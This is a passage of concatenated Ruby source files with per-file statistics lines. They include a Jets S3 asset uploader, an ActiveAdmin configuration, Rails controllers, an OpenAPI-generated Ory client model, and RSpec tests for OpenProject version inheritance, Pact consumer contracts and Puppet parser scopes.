puts "Time to upload public assets to s3: #{pretty_time(Time.now-start_time).colorize(:green)}"
end
def upload_asset_folder(folder)
expression = "#{Jets.root}public/#{folder}/**/*"
group_size = 10
Dir.glob(expression).each_slice(group_size) do |paths|
threads = []
paths.each do |path|
next unless File.file?(path)
regexp = Regexp.new(".*/#{folder}/")
relative_path = path.sub(regexp,'')
file = "#{folder}/#{relative_path}"
threads << Thread.new do
upload_asset_file(file)
end
end
threads.each(&:join)
end
end
def upload_asset_file(file)
path = "#{Jets.root}public/#{file}"
key = "jets/public/#{file}"
puts "Uploading s3://#{bucket_name}/#{key}" # uncomment to see and debug
obj = s3_resource.bucket(bucket_name).object(key)
obj.upload_file(path, acl: "public-read", cache_control: cache_control)
end
# If cache_control is provided, then it will set the entire cache-control header.
# If only max_age is provided, then we'll generate a cache_control header.
# Using max_age is the shorter and simply way of setting the cache_control header.
def cache_control
cache_control = Jets.config.assets.cache_control
unless cache_control
max_age = Jets.config.assets.max_age # defaults to 3600 in jets/application.rb
cache_control = "public, max-age=#{max_age}"
end
cache_control
end
def s3_bucket
@options[:s3_bucket]
end
# http://stackoverflow.com/questions/4175733/convert-duration-to-hoursminutesseconds-or-similar-in-rails-3-or-ruby
def pretty_time(total_seconds)
minutes = (total_seconds / 60) % 60
seconds = total_seconds % 60
if total_seconds < 60
"#{seconds.to_i}s"
else
"#{minutes.to_i}m #{seconds.to_i}s"
end
end
end
end
| 31.105263 | 126 | 0.654692 |
33bc58dadd658a7755c5f4fe1ca49ad7a3643e2e | 2,534 | ActiveAdmin.setup do |config|
#
# Add active admin pages from this engine
#
config.load_paths << File.expand_path("../../../app/admin", __FILE__)
# == User Authentication
#
# Active Admin will automatically call an authentication
# method in a before filter of all controller actions to
# ensure that there is a currently logged in admin user.
#
# This setting changes the method which Active Admin calls
# within the controller.
config.authentication_method = :authenticate_admin_user!
# == Current User
#
# Active Admin will associate actions with the current
# user performing them.
#
# This setting changes the method which Active Admin calls
# to return the currently logged in user.
config.current_user_method = :current_admin_user
# == Logging Out
#
# Active Admin displays a logout link on each screen. These
# settings configure the location and method used for the link.
#
# This setting changes the path where the link points to. If it's
# a string, the strings is used as the path. If it's a Symbol, we
# will call the method to return the path.
#
# Default:
config.logout_link_path = :destroy_admin_user_session_path
# This setting changes the http method used when rendering the
# link. For example :get, :delete, :put, etc..
#
# Default:
# config.logout_link_method = :get
# == Admin Comments
#
# Admin comments allow you to add comments to any model for admin use.
# Admin comments are enabled by default.
#
# Default:
config.allow_comments = false
#
# You can turn them on and off for any given namespace by using a
# namespace config block.
#
# Eg:
# config.namespace :without_comments do |without_comments|
# without_comments.allow_comments = false
# end
# == Controller Filters
#
# You can add before, after and around filters to all of your
# Active Admin resources from here.
#
# config.before_filter :do_something_awesome
# == Register Stylesheets & Javascripts
#
# We recommend using the built in Active Admin layout and loading
# up your own stylesheets / javascripts to customize the look
# and feel.
#
# To load a stylesheet:
config.register_stylesheet 'cmsgem/active_admin'
#
# You can provide an options hash for more control, which is passed along to stylesheet_link_tag():
# config.register_stylesheet 'my_print_stylesheet.css', :media => :print
#
# To load a javascript file:
config.register_javascript 'active_admin_custom.js'
end
| 28.47191 | 101 | 0.714286 |
7965ea38788c45be350d8d88a74fdc2aa81a083c | 1,462 | # frozen_string_literal: true
class ProfileController < ApplicationController
before_action :authenticate_user!
before_action :check_group_2fa
before_action :set_flash_on_restrictions
def show
@template = Liquid::Template.parse(Setting.registered_home_template)
@logins = current_user
.logins
.includes([:service_provider])
.select(
'DISTINCT ON(logins.service_provider_id) logins.*'
)
.order(service_provider_id: :desc, created_at: :desc)
.limit(10)
end
def template_variables # rubocop:disable Metrics/MethodLength
if current_user
{
'user' => {
'username' => current_user.username,
'email' => current_user.email
},
'groups' => current_user.groups.pluck(:name)
}
else
{}
end
end
helper_method :template_variables
protected
def check_group_2fa
@two_factor_required = []
return if current_user.two_factor_enabled?
groups = current_user.groups.where(requires_2fa: true)
@two_factor_required = groups.pluck(:name) if groups.any?
end
def set_flash_on_restrictions
@two_factor_required.each do |name|
flash[name] = "You are a member of the group '#{name}' and it requires " \
"two factor. This group won't be accessible until you " \
'enable two-factor on your account'
end
end
end
| 27.584906 | 80 | 0.638851 |
011040abfb007f768623fec5df267e118064561b | 745 | # frozen_string_literal: true
class FlagController < ApplicationController
# Authentication
before_action :authenticate_user
after_action :renew_token
# Authorization
after_action :verify_authorized
##
# Resource
#
# POST /flag
def create
@annotation = params[:comment_id] ? Comment.find(params[:comment_id]) : Conversation.find(params[:conversation_id])
authorize @annotation, :flag?
if @annotation.flag
jsonapi_render :json => @annotation, :options => { :resource => annotation_resource }
else
jsonapi_render_errors :json => @annotation, :status => :unprocessable_entity
end
end
protected
def annotation_resource
ApplicationResource.resource_for @annotation.type
end
end
| 21.911765 | 119 | 0.728859 |
ab413017a11daf147e20f64e4901132ecb0cab08 | 6,724 | =begin
#Ory APIs
#Documentation for all public and administrative Ory APIs. Administrative APIs can only be accessed with a valid Personal Access Token. Public APIs are mostly used in browsers.
The version of the OpenAPI document: v0.0.1-alpha.19
Contact: [email protected]
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 5.2.1
=end
require 'date'
require 'time'
module OryClient
class ErrorResponse
# The error message.
attr_accessor :message
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'message' => :'message'
}
end
# Returns all the JSON keys this model knows about
def self.acceptable_attributes
attribute_map.values
end
# Attribute type mapping.
def self.openapi_types
{
:'message' => :'String'
}
end
# List of attributes with nullable: true
def self.openapi_nullable
Set.new([
])
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
if (!attributes.is_a?(Hash))
fail ArgumentError, "The input argument (attributes) must be a hash in `OryClient::ErrorResponse` initialize method"
end
# check to see if the attribute exists and convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h|
if (!self.class.attribute_map.key?(k.to_sym))
fail ArgumentError, "`#{k}` is not a valid attribute in `OryClient::ErrorResponse`. Please check the name to make sure it's valid. List of attributes: " + self.class.attribute_map.keys.inspect
end
h[k.to_sym] = v
}
if attributes.key?(:'message')
self.message = attributes[:'message']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
if @message.nil?
invalid_properties.push('invalid value for "message", message cannot be nil.')
end
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if @message.nil?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
message == o.message
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Integer] Hash code
def hash
[message].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def self.build_from_hash(attributes)
new.build_from_hash(attributes)
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.openapi_types.each_pair do |key, type|
if attributes[self.class.attribute_map[key]].nil? && self.class.openapi_nullable.include?(key)
self.send("#{key}=", nil)
elsif type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :Time
Time.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :Boolean
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
# models (e.g. Pet) or oneOf
klass = OryClient.const_get(type)
klass.respond_to?(:openapi_one_of) ? klass.build(value) : klass.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
if value.nil?
is_nullable = self.class.openapi_nullable.include?(attr)
next if !is_nullable || (is_nullable && !instance_variable_defined?(:"@#{attr}"))
end
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 29.884444 | 202 | 0.627454 |
288d85eed33a3f26504092bc63d00fc0f2e81c55 | 18,665 | #-- copyright
# OpenProject is an open source project management software.
# Copyright (C) 2012-2021 the OpenProject GmbH
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2013 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See docs/COPYRIGHT.rdoc for more details.
#++
require File.expand_path(File.dirname(__FILE__) + '/../../spec_helper')
describe WorkPackages::UpdateService, "version inheritance", type: :model do
let(:type_feature) { FactoryBot.build(:type_feature) }
let(:type_task) { FactoryBot.build(:type_task) }
let(:type_bug) { FactoryBot.build(:type_bug) }
let(:version1) { project.versions.first }
let(:version2) { project.versions.last }
let(:role) { FactoryBot.build(:role) }
let(:user) { FactoryBot.build(:admin) }
let(:issue_priority) { FactoryBot.build(:priority) }
let(:status) { FactoryBot.build(:status, name: 'status 1', is_default: true) }
let(:project) do
p = FactoryBot.build(:project,
members: [FactoryBot.build(:member,
principal: user,
roles: [role])],
types: [type_feature, type_task, type_bug])
p.versions << FactoryBot.build(:version, name: 'Version1', project: p)
p.versions << FactoryBot.build(:version, name: 'Version2', project: p)
p
end
let(:story) do
story = FactoryBot.build(:work_package,
subject: 'Story',
project: project,
type: type_feature,
version: version1,
status: status,
author: user,
priority: issue_priority)
story
end
let(:story2) do
story = FactoryBot.build(:work_package,
subject: 'Story2',
project: project,
type: type_feature,
version: version1,
status: status,
author: user,
priority: issue_priority)
story
end
let(:story3) do
story = FactoryBot.build(:work_package,
subject: 'Story3',
project: project,
type: type_feature,
version: version1,
status: status,
author: user,
priority: issue_priority)
story
end
let(:task) do
FactoryBot.build(:work_package,
subject: 'Task',
type: type_task,
version: version1,
project: project,
status: status,
author: user,
priority: issue_priority)
end
let(:task2) do
FactoryBot.build(:work_package,
subject: 'Task2',
type: type_task,
version: version1,
project: project,
status: status,
author: user,
priority: issue_priority)
end
let(:task3) do
FactoryBot.build(:work_package,
subject: 'Task3',
type: type_task,
version: version1,
project: project,
status: status,
author: user,
priority: issue_priority)
end
let(:task4) do
FactoryBot.build(:work_package,
subject: 'Task4',
type: type_task,
version: version1,
project: project,
status: status,
author: user,
priority: issue_priority)
end
let(:task5) do
FactoryBot.build(:work_package,
subject: 'Task5',
type: type_task,
version: version1,
project: project,
status: status,
author: user,
priority: issue_priority)
end
let(:task6) do
FactoryBot.build(:work_package,
subject: 'Task6',
type: type_task,
version: version1,
project: project,
status: status,
author: user,
priority: issue_priority)
end
let(:bug) do
FactoryBot.build(:work_package,
subject: 'Bug',
type: type_bug,
version: version1,
project: project,
status: status,
author: user,
priority: issue_priority)
end
let(:bug2) do
FactoryBot.build(:work_package,
subject: 'Bug2',
type: type_bug,
version: version1,
project: project,
status: status,
author: user,
priority: issue_priority)
end
let(:bug3) do
FactoryBot.build(:work_package,
subject: 'Bug3',
type: type_bug,
version: version1,
project: project,
status: status,
author: user,
priority: issue_priority)
end
before(:each) do
project.save!
allow(Setting).to receive(:plugin_openproject_backlogs).and_return({ 'points_burn_direction' => 'down',
'wiki_template' => '',
'card_spec' => 'Sattleford VM-5040',
'story_types' => [type_feature.id],
'task_type' => type_task.id.to_s })
end
def standard_child_layout
# Layout is
# child
# -> task3
# -> task4
# -> bug3
# -> task5
# -> story3
# -> task6
task3.parent_id = child.id
task3.save!
task4.parent_id = child.id
task4.save!
bug3.parent_id = child.id
bug3.save!
story3.parent_id = child.id
story3.save!
task5.parent_id = bug3.id
task5.save!
task6.parent_id = story3.id
task6.save!
child.reload
end
describe 'WHEN changing version' do
let(:instance) { described_class.new(user: user, model: parent) }
shared_examples_for "changing parent's version changes child's version" do
it "SHOULD change the child's version to the parent's version" do
parent.save!
child.parent_id = parent.id
child.save!
standard_child_layout
parent.reload
call = instance.call(version: version2)
expect(call).to be_success
# Because of performance, these assertions are all in one it statement
expect(child.reload.version).to eql version2
expect(task3.reload.version).to eql version2
expect(task4.reload.version).to eql version2
expect(bug3.reload.version).to eql version1
expect(story3.reload.version).to eql version1
expect(task5.reload.version).to eql version1
expect(task6.reload.version).to eql version1
end
end
shared_examples_for "changing parent's version does not change child's version" do
it "SHOULD keep the child's version" do
parent.save!
child.parent_id = parent.id
child.save!
standard_child_layout
parent.reload
instance.call(version: version2)
# Because of performance, these assertions are all in one it statement
expect(child.reload.version).to eql version1
expect(task3.reload.version).to eql version1
expect(task4.reload.version).to eql version1
expect(bug3.reload.version).to eql version1
expect(story3.reload.version).to eql version1
expect(task5.reload.version).to eql version1
expect(task6.reload.version).to eql version1
end
end
describe 'WITH backlogs enabled' do
before(:each) do
project.enabled_module_names += ['backlogs']
end
describe 'WITH a story' do
let(:parent) { story }
describe 'WITH a task as child' do
let(:child) { task2 }
it_should_behave_like "changing parent's version changes child's version"
end
describe 'WITH a non backlogs work_package as child' do
let(:child) { bug2 }
it_should_behave_like "changing parent's version does not change child's version"
end
describe 'WITH a story as a child' do
let(:child) { story2 }
it_should_behave_like "changing parent's version does not change child's version"
end
end
describe 'WITH a task (impediment) without a parent' do
let(:parent) { task }
describe 'WITH a task as child' do
let(:child) { task2 }
it_should_behave_like "changing parent's version changes child's version"
end
describe 'WITH a non backlogs work_package as child' do
let(:child) { bug }
it_should_behave_like "changing parent's version does not change child's version"
end
end
describe 'WITH a non backlogs work_package' do
let(:parent) { bug }
describe 'WITH a task as child' do
let(:child) { task }
it_should_behave_like "changing parent's version does not change child's version"
end
describe 'WITH a non backlogs work_package as child' do
let(:child) { bug2 }
it_should_behave_like "changing parent's version does not change child's version"
end
describe 'WITH a story as a child' do
let(:child) { story }
it_should_behave_like "changing parent's version does not change child's version"
end
end
end
describe 'WITH backlogs disabled' do
before(:each) do
project.enabled_module_names = project.enabled_module_names.find_all { |n| n != 'backlogs' }
end
describe 'WITH a story' do
let(:parent) { story }
describe 'WITH a task as child' do
let(:child) { task2 }
it_should_behave_like "changing parent's version does not change child's version"
end
describe 'WITH a non backlogs work_package as child' do
let(:child) { bug2 }
it_should_behave_like "changing parent's version does not change child's version"
end
describe 'WITH a story as a child' do
let(:child) { story2 }
it_should_behave_like "changing parent's version does not change child's version"
end
end
describe 'WITH a task' do
before(:each) do
bug2.save!
task.parent_id = bug2.id # so that it is considered a task
task.save!
end
let(:parent) { task }
describe 'WITH a task as child' do
let(:child) { task2 }
it_should_behave_like "changing parent's version does not change child's version"
end
describe 'WITH a non backlogs work_package as child' do
let(:child) { bug }
it_should_behave_like "changing parent's version does not change child's version"
end
end
describe 'WITH a task (impediment) without a parent' do
let(:parent) { task }
describe 'WITH a task as child' do
let(:child) { task2 }
it_should_behave_like "changing parent's version does not change child's version"
end
describe 'WITH a non backlogs work_package as child' do
let(:child) { bug }
it_should_behave_like "changing parent's version does not change child's version"
end
end
describe 'WITH a non backlogs work_package' do
let(:parent) { bug }
describe 'WITH a task as child' do
let(:child) { task }
it_should_behave_like "changing parent's version does not change child's version"
end
describe 'WITH a non backlogs work_package as child' do
let(:child) { bug2 }
it_should_behave_like "changing parent's version does not change child's version"
end
describe 'WITH a story as a child' do
let(:child) { story }
it_should_behave_like "changing parent's version does not change child's version"
end
end
end
end
describe 'WHEN changing the parent_id' do
let(:instance) { described_class.new(user: user, model: child) }
shared_examples_for "changing the child's parent_issue to the parent changes child's version" do
it "SHOULD change the child's version to the parent's version" do
child.save!
standard_child_layout
parent.version = version2
parent.save!
instance.call(parent_id: parent.id)
# Because of performance, these assertions are all in one it statement
expect(child.reload.version).to eql version2
expect(task3.reload.version).to eql version2
expect(task4.reload.version).to eql version2
expect(bug3.reload.version).to eql version1
expect(story3.reload.version).to eql version1
expect(task5.reload.version).to eql version1
expect(task6.reload.version).to eql version1
end
end
shared_examples_for "changing the child's parent to the parent leaves child's version" do
it "SHOULD keep the child's version" do
child.save!
standard_child_layout
parent.version = version2
parent.save!
instance.call(parent_id: parent.id)
# Because of performance, these assertions are all in one it statement
expect(child.reload.version).to eql version1
expect(task3.reload.version).to eql version1
expect(task4.reload.version).to eql version1
expect(bug3.reload.version).to eql version1
expect(story3.reload.version).to eql version1
expect(task5.reload.version).to eql version1
expect(task6.reload.version).to eql version1
end
end
describe 'WITH backogs enabled' do
before(:each) do
story.project.enabled_module_names += ['backlogs']
end
describe 'WITH a story as parent' do
let(:parent) { story }
describe 'WITH a story as child' do
let(:child) { story2 }
it_should_behave_like "changing the child's parent to the parent leaves child's version"
end
describe 'WITH a task as child' do
let(:child) { task2 }
it_should_behave_like "changing the child's parent_issue to the parent changes child's version"
end
describe 'WITH a non-backlogs work_package as child' do
let(:child) { bug2 }
it_should_behave_like "changing the child's parent to the parent leaves child's version"
end
end
describe "WITH a story as parent
WITH the story having a non backlogs work_package as parent
WITH a task as child" do
before do
bug2.save!
story.parent_id = bug2.id
story.save!
end
let(:parent) { story }
let(:child) { task2 }
it_should_behave_like "changing the child's parent_issue to the parent changes child's version"
end
describe 'WITH a task as parent' do
before(:each) do
story.save!
task.parent_id = story.id
task.save!
story.reload
task.reload
end
# Needs to be the story because it is not possible to change a task's
# 'version_id'
let(:parent) { story }
describe 'WITH a task as child' do
let(:child) { task2 }
it_should_behave_like "changing the child's parent_issue to the parent changes child's version"
end
describe 'WITH a non-backlogs work_package as child' do
let(:child) { bug2 }
it_should_behave_like "changing the child's parent to the parent leaves child's version"
end
end
describe 'WITH an impediment (task) as parent' do
let(:parent) { task }
describe 'WITH a task as child' do
let(:child) { task2 }
it_should_behave_like "changing the child's parent_issue to the parent changes child's version"
end
describe 'WITH a non-backlogs work_package as child' do
let(:child) { bug2 }
it_should_behave_like "changing the child's parent to the parent leaves child's version"
end
end
describe 'WITH a non-backlogs work_package as parent' do
let(:parent) { bug }
describe 'WITH a story as child' do
let(:child) { story2 }
it_should_behave_like "changing the child's parent to the parent leaves child's version"
end
describe 'WITH a task as child' do
let(:child) { task2 }
it_should_behave_like "changing the child's parent to the parent leaves child's version"
end
describe 'WITH a non-backlogs work_package as child' do
let(:child) { bug2 }
it_should_behave_like "changing the child's parent to the parent leaves child's version"
end
end
end
end
end
| 31.905983 | 109 | 0.573265 |
87fc8611fcf26b53f2e721c44f9cb9cc4d64ce0a | 7,074 | require 'spec_helper'
require 'pact/consumer_contract'
module Pact
describe ConsumerContract do
describe "as_json" do
class MockInteraction
def as_json(options ={})
{:mock => "interaction"}
end
end
def silence_warnings
old_verbose, $VERBOSE = $VERBOSE, nil
yield
ensure
$VERBOSE = old_verbose
end
before do
@backup_version = Pact::VERSION
silence_warnings do
Pact::VERSION = "1.0"
end
DateTime.stub(:now).and_return(DateTime.strptime("2013-08-15T13:27:13+10:00"))
end
let(:service_consumer) { double('ServiceConsumer', :as_json => {:a => 'consumer'}) }
let(:service_provider) { double('ServiceProvider', :as_json => {:a => 'provider'}) }
let(:pact) { ConsumerContract.new({:interactions => [MockInteraction.new], :consumer => service_consumer, :provider => service_provider }) }
let(:expected_as_json) { {:provider=>{:a=>"provider"}, :consumer=>{:a=>"consumer"}, :interactions=>[{:mock=>"interaction"}], :metadata=>{:pact_gem=>{:version=>"1.0"}}} }
it "should return a hash representation of the Pact" do
pact.as_json.should eq expected_as_json
end
after do
silence_warnings do
Pact::VERSION = @backup_version
end
end
end
describe ".from_json" do
let(:loaded_pact) { ConsumerContract.from_json(string) }
context "when the top level object is a ConsumerContract" do
let(:string) { '{"interactions":[{"request": {"path":"/path", "method" : "get"}}], "consumer": {"name" : "Bob"} , "provider": {"name" : "Mary"} }' }
it "should create a Pact" do
loaded_pact.should be_instance_of ConsumerContract
end
it "should have interactions" do
loaded_pact.interactions.should be_instance_of Array
end
it "should have a consumer" do
loaded_pact.consumer.should be_instance_of Pact::ServiceConsumer
end
it "should have a provider" do
loaded_pact.provider.should be_instance_of Pact::ServiceProvider
end
end
context "with old 'producer' key" do
let(:string) { File.read('./spec/support/a_consumer-a_producer.json')}
it "should create a Pact" do
loaded_pact.should be_instance_of ConsumerContract
end
it "should have interactions" do
loaded_pact.interactions.should be_instance_of Array
end
it "should have a consumer" do
loaded_pact.consumer.should be_instance_of Pact::ServiceConsumer
end
it "should have a provider" do
loaded_pact.provider.should be_instance_of Pact::ServiceProvider
loaded_pact.provider.name.should eq "an old producer"
end
it "should have a provider_state" do
loaded_pact.interactions.first.provider_state.should eq 'state one'
end
end
end
describe "find_interactions" do
let(:consumer) { double('Pact::ServiceConsumer', :name => 'Consumer')}
let(:provider) { double('Pact::ServiceProvider', :name => 'Provider')}
let(:interaction) { double('Pact::Interaction') }
subject { ConsumerContract.new(:interactions => [interaction], :consumer => consumer, :provider => provider) }
let(:criteria) { {:description => /blah/} }
before do
interaction.should_receive(:matches_criteria?).with(criteria).and_return(matches)
end
context "by description" do
context "when no interactions are found" do
let(:matches) { false }
it "returns an empty array" do
expect(subject.find_interactions(criteria)).to eql []
end
end
context "when interactions are found" do
let(:matches) { true }
it "returns an array of the matching interactions" do
expect(subject.find_interactions(criteria)).to eql [interaction]
end
end
end
end
describe "find_interaction" do
let(:consumer) { double('Pact::ServiceConsumer', :name => 'Consumer')}
let(:provider) { double('Pact::ServiceProvider', :name => 'Provider')}
let(:interaction1) { double('Pact::Interaction') }
let(:interaction2) { double('Pact::Interaction') }
let(:criteria) { {:description => /blah/} }
before do
interaction1.should_receive(:matches_criteria?).with(criteria).and_return(matches1)
interaction2.should_receive(:matches_criteria?).with(criteria).and_return(matches2)
end
subject { ConsumerContract.new(:interactions => [interaction1, interaction2], :consumer => consumer, :provider => provider) }
context "by description" do
context "when a match is found" do
let(:matches1) { true }
let(:matches2) { false }
it "returns the interaction" do
expect(subject.find_interaction criteria).to eql interaction1
end
end
context "when more than one match is found" do
let(:matches1) { true }
let(:matches2) { true }
it "raises an error" do
expect{ subject.find_interaction(criteria) }.to raise_error "Found more than 1 interaction matching {:description=>/blah/} in pact file between Consumer and Provider."
end
end
context "when a match is not found" do
let(:matches1) { false }
let(:matches2) { false }
it "raises an error" do
expect{ subject.find_interaction(criteria) }.to raise_error "Could not find interaction matching {:description=>/blah/} in pact file between Consumer and Provider."
end
end
end
end
describe "update_pactfile" do
let(:pacts_dir) { Pathname.new("./tmp/pactfiles") }
let(:expected_pact_path) { pacts_dir + "test_consumer-test_service.json" }
let(:expected_pact_string) do <<-eos
{
"provider": {
"name": "test_service"
},
"consumer": {
"name": "test_consumer"
},
"interactions": [
"something"
],
"metadata": {
"pact_gem": {
"version": "#{Pact::VERSION}"
}
}
}
eos
end
let(:consumer) { Pact::ServiceConsumer.new(:name => 'test_consumer')}
let(:provider) { Pact::ServiceProvider.new(:name => 'test_service')}
let(:interactions) { [double("interaction", as_json: "something")]}
subject { ConsumerContract.new(:consumer => consumer, :provider => provider, :interactions => interactions) }
before do
Pact.configuration.stub(:pact_dir).and_return(Pathname.new("./tmp/pactfiles"))
FileUtils.rm_rf pacts_dir
FileUtils.mkdir_p pacts_dir
subject.update_pactfile
end
it "should write to a file specified by the consumer and provider name" do
File.exist?(expected_pact_path).should be_true
end
it "should write the interactions to the file" do
File.read(expected_pact_path).should eql expected_pact_string.strip
end
end
end
end | 35.727273 | 179 | 0.627226 |
bfd3c72aba43343a53fe260dc3e053366bb4b5bf | 26,092 | #! /usr/bin/env ruby
require 'spec_helper'
require 'puppet_spec/compiler'
require 'puppet_spec/scope'
describe Puppet::Parser::Scope do
include PuppetSpec::Scope
before :each do
@scope = Puppet::Parser::Scope.new(
Puppet::Parser::Compiler.new(Puppet::Node.new("foo"))
)
@scope.source = Puppet::Resource::Type.new(:node, :foo)
@topscope = @scope.compiler.topscope
@scope.parent = @topscope
end
describe "create_test_scope_for_node" do
let(:node_name) { "node_name_foo" }
let(:scope) { create_test_scope_for_node(node_name) }
it "should be a kind of Scope" do
expect(scope).to be_a_kind_of(Puppet::Parser::Scope)
end
it "should set the source to a node resource" do
expect(scope.source).to be_a_kind_of(Puppet::Resource::Type)
end
it "should have a compiler" do
expect(scope.compiler).to be_a_kind_of(Puppet::Parser::Compiler)
end
it "should set the parent to the compiler topscope" do
expect(scope.parent).to be(scope.compiler.topscope)
end
end
it "should generate a simple string when inspecting a scope" do
expect(@scope.inspect).to eq("Scope()")
end
it "should generate a simple string when inspecting a scope with a resource" do
@scope.resource="foo::bar"
expect(@scope.inspect).to eq("Scope(foo::bar)")
end
it "should return a scope for use in a test harness" do
expect(create_test_scope_for_node("node_name_foo")).to be_a_kind_of(Puppet::Parser::Scope)
end
it "should be able to retrieve class scopes by name" do
@scope.class_set "myname", "myscope"
expect(@scope.class_scope("myname")).to eq("myscope")
end
it "should be able to retrieve class scopes by object" do
klass = mock 'ast_class'
klass.expects(:name).returns("myname")
@scope.class_set "myname", "myscope"
expect(@scope.class_scope(klass)).to eq("myscope")
end
it "should be able to retrieve its parent module name from the source of its parent type" do
@topscope.source = Puppet::Resource::Type.new(:hostclass, :foo, :module_name => "foo")
expect(@scope.parent_module_name).to eq("foo")
end
it "should return a nil parent module name if it has no parent" do
expect(@topscope.parent_module_name).to be_nil
end
it "should return a nil parent module name if its parent has no source" do
expect(@scope.parent_module_name).to be_nil
end
it "should get its environment from its compiler" do
env = Puppet::Node::Environment.create(:testing, [])
compiler = stub 'compiler', :environment => env, :is_a? => true
scope = Puppet::Parser::Scope.new(compiler)
expect(scope.environment).to equal(env)
end
it "should fail if no compiler is supplied" do
expect {
Puppet::Parser::Scope.new
}.to raise_error(ArgumentError, /wrong number of arguments/)
end
it "should fail if something that isn't a compiler is supplied" do
expect {
Puppet::Parser::Scope.new(:compiler => true)
}.to raise_error(Puppet::DevError, /you must pass a compiler instance/)
end
it "should use the resource type collection helper to find its known resource types" do
expect(Puppet::Parser::Scope.ancestors).to include(Puppet::Resource::TypeCollectionHelper)
end
describe "when custom functions are called" do
let(:env) { Puppet::Node::Environment.create(:testing, []) }
let(:compiler) { Puppet::Parser::Compiler.new(Puppet::Node.new('foo', :environment => env)) }
let(:scope) { Puppet::Parser::Scope.new(compiler) }
it "calls methods prefixed with function_ as custom functions" do
expect(scope.function_sprintf(["%b", 123])).to eq("1111011")
end
it "raises an error when arguments are not passed in an Array" do
expect do
scope.function_sprintf("%b", 123)
end.to raise_error ArgumentError, /custom functions must be called with a single array that contains the arguments/
end
it "raises an error on subsequent calls when arguments are not passed in an Array" do
scope.function_sprintf(["first call"])
expect do
scope.function_sprintf("%b", 123)
end.to raise_error ArgumentError, /custom functions must be called with a single array that contains the arguments/
end
it "raises NoMethodError when the not prefixed" do
expect { scope.sprintf(["%b", 123]) }.to raise_error(NoMethodError)
end
it "raises NoMethodError when prefixed with function_ but it doesn't exist" do
expect { scope.function_fake_bs(['cows']) }.to raise_error(NoMethodError)
end
end
describe "when initializing" do
it "should extend itself with its environment's Functions module as well as the default" do
env = Puppet::Node::Environment.create(:myenv, [])
root = Puppet.lookup(:root_environment)
compiler = stub 'compiler', :environment => env, :is_a? => true
scope = Puppet::Parser::Scope.new(compiler)
expect(scope.singleton_class.ancestors).to be_include(Puppet::Parser::Functions.environment_module(env))
expect(scope.singleton_class.ancestors).to be_include(Puppet::Parser::Functions.environment_module(root))
end
it "should extend itself with the default Functions module if its environment is the default" do
root = Puppet.lookup(:root_environment)
node = Puppet::Node.new('localhost')
compiler = Puppet::Parser::Compiler.new(node)
scope = Puppet::Parser::Scope.new(compiler)
expect(scope.singleton_class.ancestors).to be_include(Puppet::Parser::Functions.environment_module(root))
end
end
describe "when looking up a variable" do
it "should support :lookupvar and :setvar for backward compatibility" do
@scope.setvar("var", "yep")
expect(@scope.lookupvar("var")).to eq("yep")
end
it "should fail if invoked with a non-string name" do
